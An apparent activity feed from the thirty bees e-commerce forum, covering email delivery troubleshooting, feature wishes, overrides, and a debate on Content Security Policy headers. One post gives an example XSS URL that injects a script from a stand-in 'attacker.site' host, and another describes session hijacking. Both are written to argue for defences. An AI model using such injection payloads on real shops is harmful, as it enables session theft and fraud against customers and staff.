All Activity

  1. Yesterday
  2. THANK YOU! Changing the email in Preferences > Store Contacts solved the problem. I had it as my outlook.com email as that's where I wanted to receive emails at, but changing it to my custom domain worked like a charm.
  3. My wishes:
     - An option to start an attribute combination with “select a” instead of a default value. I know this is a template job...
     - Option to automatically hide categories without products or subcategories with products. There are now modules that do such a thing, but the problem is that while they disable, you have to re-enable yourself.
     - Option to disable combinations.
     - Auto-save for customizations.
     - Option to include attachments in messages to customers.
     - And finally the big fish: a solution for the combination problems. There are several situations where the Prestashop combination structure gives problems:
       - with too many combinations everything becomes slow
       - some attributes don't influence stock
       - some attributes have their own stock
     The solution that seems the most feasible to me at the moment is the following:
     - you need an additional table. Let's call it product-addons.
     - a product-addon can be either a product or an attribute. If you need stock keeping you use a product. A product can be set to be used in this function only.
     - the attribute table is expanded with a weight and a price field.
     - an addon product can have attribute combinations. If there is more than one attribute, the combinations will be merged into a single select menu ("carpet size: large; color: red"). If an addon product has product-addons itself, they will be ignored.
     - addon products without combinations and single-value attribute groups will be displayed as checkboxes.
     - I hope there is some possibility to insert those extra fields with hooks in templates that don't support them.
     - the category_product table will need an extra field for the product-addons. In the order_detail table the information can be part of the name field.
  4. Hello. As far as I understood, the point is to mitigate what I think can be called the "third man in the middle attack". I think that Datakick's examples are pretty much pertinent and self-explanatory; using these headers, and in particular CSP, makes it more difficult. From a non-expert point of view such as mine, it appears anyway quite clear and logical that when the server and the browser are instructed not to accept "things" coming from sources that are not expressly declared as legitimate, the possibility for anyone to inject on-the-fly instructions that divert the client toward a malicious server and receive deceptive data, or vice versa, can be sensibly reduced. I understand that the use of these headers makes the whole work of the developer/implementer/merchant more difficult and also costly; however, while of course as a principle it is always good to try to patch everything in the software used, it is also always good as a principle to try to patch everything else that interacts with the software used, thus I think that hardening the methods by which the client-server communication happens is just logical and a better practice. As a matter of fact, 100% security is maybe never achievable, but the harder it is to get around security protocols, the better the chances that an attacker fails, so why not at least try to implement all that is reasonably possible? The CSP rule I set is extra permissive; I also use mod_security with WAF rules from Comodo, and at the moment almost everything seems to work well. I need to study this more and I will report my findings here; anyone interested, please participate in this initiative. It would be very good to find out the proper "recipe" for a good CSP policy that works fine with TB. Thank you. Best regards
  5. It looks like thirty bees successfully relayed the email to the email delivery software, since there is a log entry about this. If the email is not delivered, it can be for various reasons, none of them tb related 🙂 This often happens when you are trying to send email from an address that does not allow your server to act as an origin. Other servers will put that email in the spam box, or simply drop it. Check your Shop email address in Preferences > Store Contacts, and ensure your server has rights to send email on behalf of that address. Since you already have a testing PHP application for sending emails, you can test it there: edit it, use the Shop Email address as the 'from' address, and see if the email is delivered. If it is not delivered, then investigate the SPF and DKIM associated with the domain of this from address.
  6. At the start, you can simply reuse the same functionality you already have for ps17, and assume all features have these two flags enabled.
  7. Thanks. I see that you allow settings per feature and you have also added a flag for custom values. Nice to see extra options compared to Prestashop. But I am not yet sure how easy it will be to implement for me.
  8. Last week
  9. I had to use phpmailer, as my server forbids me to use mail(). But you said you can use it from another script.
  10. Hello! I'm trying to set free shipping just for one carrier, starting from an amount of money (3000 in my case). I see there are two possibilities: 1) from the carrier, setting two ranges, 0 to 3000 with the actual price and 3000 to inf with zero; 2) setting a cart rule with a minimum of 3000, and selecting just the carrier I want to give the free shipping. I think the second one is the best. I did it, and it shows free shipping, but only after buying, not in the modal after adding to cart, nor in the summary. After adding a product that reaches 3000 the modal says: If I go to checkout: But, after clicking finish order, the rule applies: Is this expected? The rule is applied only when finishing the order, and not when adding products beyond my rule limit. Thanks!
  11. I still don't get it very well. In TB there is also the possibility of "related products", where you can directly "bind" the base plate (or plates) for a specific u-bolt. No need to search anything. But maybe my English is not good enough to understand.
  12. Just to be thorough, here are all my PHP modules:
  13. Setup: ThirtyBees 1.2, PHP 7.4, MySQL. I just installed ThirtyBees two days ago and I am working on getting my store set up. Of course, I want to receive email notifications when a customer places an order, comments on an order, or sends an email to customer service. Right now none of that is working. I have IMAP settings in the Customer Service tab, and it pulls messages fine from that. But when I reply, the customer is not sent an email. Similarly, I'm not receiving any emails when things happen. All the emails show up in the Advanced Parameters > E-mail tab. In that tab, I have tried the "Test your Email Configuration" section but NEVER receive an email. I have tried using the PHP mail() function; it doesn't work. But when I create a standard PHP page somewhere else on my server and go to it, the mail function works fine there. I have tried SMTP and that doesn't work either, but my SMTP settings are working and tested with the SMTP test website. I have enabled debug mode but don't see any error logs. All I get are success notifications when I try to send a message (test or to the customer), never any error messages. There is also nothing in the error_log file. I've read this thread and this issue on GitHub; neither is my issue and they are on older versions (and I NEVER get any error messages). I guess I'm coming to the limit of what I can do in the UI, and I'm not too familiar with the back-end. Installed using Softaculous on a cPanel server. I have all the appropriate PHP modules according to the README on the repo. Any help would be greatly appreciated. If someone thinks this would be better suited as a GitHub Issue then I will gladly put it there instead.
  14. Combinations are essentially about displaying different products, whereas this is more about the features of a single product. Features do not have any weight / price attributes. For example, we sell u-bolts and backing plates. Our backing plates have slotted holes rather than round holes. Now, consider a feature ‘Distance between legs’ of the u-bolt. For any given u-bolt that is fixed. We might have one u-bolt with 50 mm between the legs, another with 51 between the legs and another with 53 between the legs, etc. Because the base plates have slotted rather than round holes, they can accommodate all three of those u-bolts, so the base plates need to have the feature ‘distance between legs’ of 50, 51, 52, 53. We then have filters (advanced search 4, or block layered navigation) on the base plate so that a customer can choose 50, 51, 52 or 53 and they will be directed to the single product.
  15. JustaHippy

    1.2 and Paypal

    I see that the Paypal mod was not included in the 1.2 TB package, so I went to Github and snagged it. Things have not gone well, so I assume this is why it wasn't included? It does not acknowledge my server as having TLSv1.2, which it does, and every time I hit save it throws a 500.
  16. Of course. Here you can see the db differences: https://github.com/thirtybees/thirtybees/commit/ee852aef81420882a7a042e2d7978a790c8c37dd#diff-2a48baaddf0416cfb05978271a4ca9a83881e6f54ac663389063ba1d59c28135
  17. 🙂 It happens all the time. And it will continue to happen. It's just not possible to close all the holes in the core, the themes, all the native or third-party modules, or any third-party software that can be installed alongside.
  18. Of course I know how XSS works. This "somehow manages" simply must not happen. Neither originating from a browser, nor originating from elsewhere.
  19. Is there some flag in the database that indicates that multifeature? I would like to support it in Prestools like I do it for PS 1.7.3+. I assume other people building for Thirty Bees will face the same question.
  20. You apparently don't understand how an XSS attack works. It's not the attacker that interacts with the server, it's a third-party user. If the attacker somehow manages to inject javascript into the page that is rendered for a different user, he can steal that user's session and do whatever he wants on behalf of that poor user. This can be done, for example, by posting an exploit link on a public forum, or by directly sending a link via email to some known user of the server. Once the user clicks on the link, the attacker gains access to his identity / session / cookies. This problem is much more severe in the back office, where the attacker can act as an employee. They can trigger ajax calls to approve or create orders, change the pricing of products, create a new employee, or whatnot. At that point it is just a series of well-formed HTTP requests. They can perform the same operations the employee can. That's why the store owner should never (or rarely) use the admin profile. They should create and use a different permission profile to mitigate the risks. On the front office XSS is not such a huge deal, but it is still a big problem. The attacker can impersonate the customer, and that can lead to serious issues. For example, I can imagine a script that posts a message via the contact form and asks to ship the last order to a different address. The shop owner will, of course, believe this message, because it came from a logged-in customer. And they will send the goods to a different address. This is a real problem, and CSP can help a lot. It's not a silver bullet, of course, but nothing is.
  21. If hackers can work around a security measure by simply accessing the server directly, this measure is pointless. Maybe that's why I don't care much about such headers and turn my attention to the safety of the code instead. That said, if these headers don't get in the way, it's fine to add them. Not too easy, because modules have a tendency to grab resources from just about everywhere: fonts, images, icons; some even call home.
  22. Thanks for the reply. There are far too many differences in the files for me to work out what would be needed. So probably best if I revert to the old practice of replacing the original file and just try to remember after every update
  23. It will be merged with the tb core file, possibly causing conflicts. The more code the override contains, the more friction it can cause. Just try to put in the smallest amount of code that's needed. It will probably be just one or two methods, no more.
  24. After every TB update we have to revert search.php to an old PS 1.6 file, as our SKUs (reference codes) contain special characters (*, -, /, etc.) and the current search cannot search properly. This is becoming a faff which I tend to forget. I had a brainwave: I tried putting the whole old PS 1.6 search.php file into the overrides/classes folder and it seems to work. Is that OK, adding a whole file as an override?
  25. Of course they improve security. They wouldn't exist otherwise. They are not intended to stop attackers interacting with the server directly, of course. But they are very useful for preventing cross-site scripting, script injections, and similar attacks. Example scenario: a hacker figures out that some query parameter on your server, say "&id_order=1", is displayed in the page without escaping or validation. The hacker can then create a URL to your server with this parameter containing javascript. Something like this: http://yourdomain.com/some/page?id_order%3D%3Cscript%20href%3D%22https%3A//attacker.site/malicious_script.js%22%3E This will insert <script src="https://attacker.site/malicious_script.js" /> into the page. And that's bad. The script can now do various things: listen to key strokes to figure out your customer's password, submit ajax requests to place orders on his behalf, or submit the contact form to send spam emails. And who knows what else. By setting a proper CSP on the server this problem can be mitigated, to some extent. With strict CSP rules, browsers (the good ones) will prevent this injection, and the user won't be affected. Of course, all such security holes must be fixed in the thirty bees code. But we can never be sure that we fixed them all. We probably never will. Thus, having a strict CSP would definitely help.
  26. Hello, up to which Elasticsearch version would be suitable to use with this module in 2021? I'm currently trying to test this module with Thirtybees Bleeding Edge 1.3 / Niara theme and Nginx / PHP 7.3 / Debian 10 / Elasticsearch 7.12.0, and it appears to be promising. A few comments:
      - I don't see a way to do a full reindex automatically (no URL for CRON)
      - at the end of all result pages I always have a "No results :(" line, whereas that's not the case at all
      - search facets appear (in the left column) when you do a search from a product page or category page, but NOT from the home/index page (because the left column is disabled from the theme page configuration)
      I wish it would be possible to "dock" search facets on the left à la doofinder.com (